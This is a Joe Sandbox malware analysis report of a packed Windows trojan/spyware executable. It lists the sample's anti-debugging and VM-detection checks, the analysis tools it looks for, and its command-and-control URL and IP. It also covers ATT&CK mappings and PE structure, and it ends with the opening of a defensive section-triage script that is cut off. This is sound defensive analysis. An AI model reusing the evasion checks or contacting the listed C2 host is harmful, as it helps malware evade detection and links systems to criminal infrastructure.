Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Special instruction interceptor: First address: 1471978 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Special instruction interceptor: First address: 169ED7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00F79980 rdtsc 0_2_00F79980
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D929FF
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 5KwhHEdmM4.exe | Binary or memory string: Hyper-V RAW
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 5KwhHEdmM4.exe, 00000000.00000003.1396390442.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396459434.0000000001C67000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396977659.0000000001C6A000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000002.1415202643.0000000001C6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+Mr1VBa306OLwt4fiuEbkfabhdV13XNOmA7W3g2\/VTwY26fnvEHibwXkEq1DG5xTxOOoVJ0qmX5ZF4\/F069JuNTD1\/YXw2Drws+enjsRhpRtZ+9KKf6bwz4P+IHFVPD4rA5DWweXYmnTr0c0ziUcrwVXDVoxlSxWGWJti8fhqqlF062XYXGQmryTcYTcfksf8tPx\/rUdforY\/Br4QeJtFUXPgiXw\/M8jMNR8JeKfEsGoIwI2xlfFuoeM9LktuD5kf9lx3LgkJewna6+X+I\/2R78+ZN4A8caNrnEjR6J4tgHgvWZXJ3R29pqMl1qvhGZETKPf6x4i8NCSRQy2UaybI\/MyTxk4KzRqGIr4\/I5Ta9n\/bWFhSoyXWc8Xga+YYLDQSs3PGYnDq2uvLLl97PvALxCyWMp4bD5bxHCmr1f8AV\/GVK1eL+zCngczwuV5h
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File opened: NTICE
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File opened: SICE
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00F79980 rdtsc 0_2_00F79980
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49701 -> 5.101.3.217:80
MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures; techniques without a count are matrix placeholders that were not observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
5KwhHEdmM4.exe | 47% | ReversingLabs | Win32.Trojan.Generic
5KwhHEdmM4.exe | 100% | Avira | TR/Crypt.TPM.Gen
5KwhHEdmM4.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=000 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | 5KwhHEdmM4.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 5KwhHEdmM4.exe, 00000000.00000003.1397048941.0000000001BF7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | 5KwhHEdmM4.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=000 | 5KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | 5KwhHEdmM4.exe | false | | high
https://curl.se/docs/alt-svc.html | 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581405
Start date and time: 2024-12-27 15:04:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5KwhHEdmM4.exe (renamed because original name is a hash value)
Original Sample Name: 0c9fc2b51c7c604fd0bd9789f344cb95.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 5KwhHEdmM4.exe
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.226.108.155 | dZsdMl5Pwl.exe | malicious | Unknown |
34.226.108.155 | OAKPYEH4c6.exe | malicious | LummaC |
34.226.108.155 | ZTM2pfyhu3.exe | malicious | LummaC |
34.226.108.155 | BkB1ur7aFW.exe | malicious | Unknown |
34.226.108.155 | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc |
34.226.108.155 | 3stIhG821a.exe | malicious | LummaC |
34.226.108.155 | 4o4t8dO4r1.exe | malicious | Unknown |
34.226.108.155 | 8wiUGtm9UM.exe | malicious | LummaC |
34.226.108.155 | mBr65h6L4w.exe | malicious | Unknown |
34.226.108.155 | HrIrtCXI3s.exe | malicious | Unknown |
5.101.3.217 | dZsdMl5Pwl.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | BkB1ur7aFW.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | OoYYtngD7d.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | NWJ4JvzFcs.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | EwhnoHx0n5.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | PqHnYMj5eF.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | qZA8AyGxiA.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | 4o4t8dO4r1.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | xXe4fTmV2h.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | lolvgcpX19.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fiveth5ht.top | dZsdMl5Pwl.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | BkB1ur7aFW.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | OoYYtngD7d.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | NWJ4JvzFcs.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | EwhnoHx0n5.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | PqHnYMj5eF.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | qZA8AyGxiA.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | 4o4t8dO4r1.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | xXe4fTmV2h.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | lolvgcpX19.exe | malicious | Unknown | 5.101.3.217
httpbin.org | QzK1LCSuq2.exe | malicious | LummaC | 3.218.7.103
httpbin.org | dZsdMl5Pwl.exe | malicious | Unknown | 34.226.108.155
httpbin.org | OAKPYEH4c6.exe | malicious | LummaC | 34.226.108.155
httpbin.org | ZTM2pfyhu3.exe | malicious | LummaC | 34.226.108.155
httpbin.org | BkB1ur7aFW.exe | malicious | Unknown | 34.226.108.155
httpbin.org | OoYYtngD7d.exe | malicious | Unknown | 3.218.7.103
httpbin.org | NWJ4JvzFcs.exe | malicious | Unknown | 3.218.7.103
httpbin.org | EwhnoHx0n5.exe | malicious | Unknown | 3.218.7.103
httpbin.org | PqHnYMj5eF.exe | malicious | Unknown | 3.218.7.103
httpbin.org | YrxiR3yCLm.exe | malicious | LummaC | 3.218.7.103

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PINDC-ASRU | dZsdMl5Pwl.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | BkB1ur7aFW.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc | 5.101.3.217
PINDC-ASRU | OoYYtngD7d.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | NWJ4JvzFcs.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | EwhnoHx0n5.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | PqHnYMj5eF.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | qZA8AyGxiA.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | 4o4t8dO4r1.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | xXe4fTmV2h.exe | malicious | Unknown | 5.101.3.217
AMAZON-AESUS | QzK1LCSuq2.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | dZsdMl5Pwl.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | OAKPYEH4c6.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | ZTM2pfyhu3.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | BkB1ur7aFW.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc | 34.226.108.155
AMAZON-AESUS | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 34.195.210.183
AMAZON-AESUS | OoYYtngD7d.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | NWJ4JvzFcs.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | EwhnoHx0n5.exe | malicious | Unknown | 3.218.7.103
No context
No context
No created / dropped files found
                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.984618823919531
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:5KwhHEdmM4.exe
                                                        File size:4'488'704 bytes
                                                        MD5:0c9fc2b51c7c604fd0bd9789f344cb95
                                                        SHA1:c9dcd9ec34f73e7d109605f5b092e7f16be55bd7
                                                        SHA256:5215a50e992b411a73a9cb9dee51b39ce8b7505de7995bcba240e6f809b3696b
                                                        SHA512:264670682c48ce6ab59f62187f31b7afff4832c1ec0115b83864e6df8318b8c818c49ed14a54ef9c13abe30bc522ac6eba76ece5cb9a455ec8c47a64d22d2885
                                                        SSDEEP:98304:dGz4NC30FzVzO37pp8vTUm66oGy7IvqGc8RZD5ieCXTQuGbov:dGz4Ny0FVzACTUm6LG6Ivp9ZIXcjo
                                                        TLSH:69263354DDA530A8D6E45172F139511BFE928D31CEAF2A32CD6E3B5ECAF250FB1021A1
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2... ....... I...@..........................P.......3E...@... ............................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x1032000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                        Signature Valid:
                                                        Signature Issuer:
                                                        Signature Validation Error:
                                                        Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:
                                                            Instruction
                                                            jmp 00007F10C4CF4B8Ah
                                                            subps xmm0, dqword ptr [eax+eax+00h]
                                                            add byte ptr [eax], al
                                                            add cl, ch
                                                            add byte ptr [eax], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add bh, bh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6dd05f         0x73          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6dc000         0x1ac         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x708a00         0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc30590         0x10          dmqztadf
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xc30540         0x18          dmqztadf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
The SECURITY entry is a file offset rather than an RVA, which is why it maps to no section. At 0x708a00 (7,375,360) it also points past the end of this 4,488,704-byte file, so no certificate can be read from it; that is consistent with the empty Signature fields above even though the file is reported as digitally signed.
Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
(unnamed)  0x1000           0x6db000      0x288a00  14a13668632ee8df7a186a629b18b2cb  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc      0x6dc000         0x1ac         0x200     0740829dfdbec4c7e3c4ea75a52a588a  False     0.580078125         data                  4.556299681886651   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata     0x6dd000         0x1000        0x200     6363462e4ea156e03144265f6be7871e  False     0.166015625         data                  1.1763897754724144  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed)  0x6de000         0x397000      0x200     302aed0bda07d9b350a9f8d1f38fd70c  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dmqztadf   0xa75000         0x1bc000      0x1bb800  635fb0382f0b9e2b2812fb71d1a4b746  False     0.994349809751973   data                  7.955259097933418   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eghuolxt   0xc31000         0x1000        0x400     8c1a54dd0b46fbdea313703b0bc267d7  False     0.818359375         data                  6.344694180445355   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant   0xc32000         0x3000        0x2200    d25fb50028601d246281562c206bd66e  False     0.05859375          DOS executable (COM)  0.7096670996240843  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Every section except .rsrc and .idata is mapped readable, writable and executable, and the entry point 0x1032000 (image base 0x400000 + RVA 0xc32000) sits in .taggant, the last section, so execution starts outside any conventionally named section; the two large unnamed sections carry raw data for which no type or entropy was computed.
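A practitioner reviewing this section table usually wants to reproduce the three findings it implies (entry point in a non-standard last section, every executable section also writable, near-8.0 entropy in the packed section) without trusting a GUI. The following script is an added example, not code from the report or from Joe Sandbox: it parses the COFF, optional and section headers with the Python standard library and reports those traits. It runs on a PE32 image assembled in memory whose section names, RVAs, virtual sizes and characteristics are taken from this table; the contents are synthetic filler and the raw sizes are shrunk, so entropy and hash values differ from the report while the structural findings (entry point 0x1032000 inside .taggant, five RWX sections) match. The STANDARD_SECTION_NAMES set and the 7.0 entropy threshold are the script's own assumptions.

```python
"""Static PE section triage (added example, not Joe Sandbox code): entry-point section,
writable+executable sections and per-section entropy, on an image built in memory."""
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE = 0x40, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Assumption: names mainstream linkers emit; anything else is treated as non-standard for triage.
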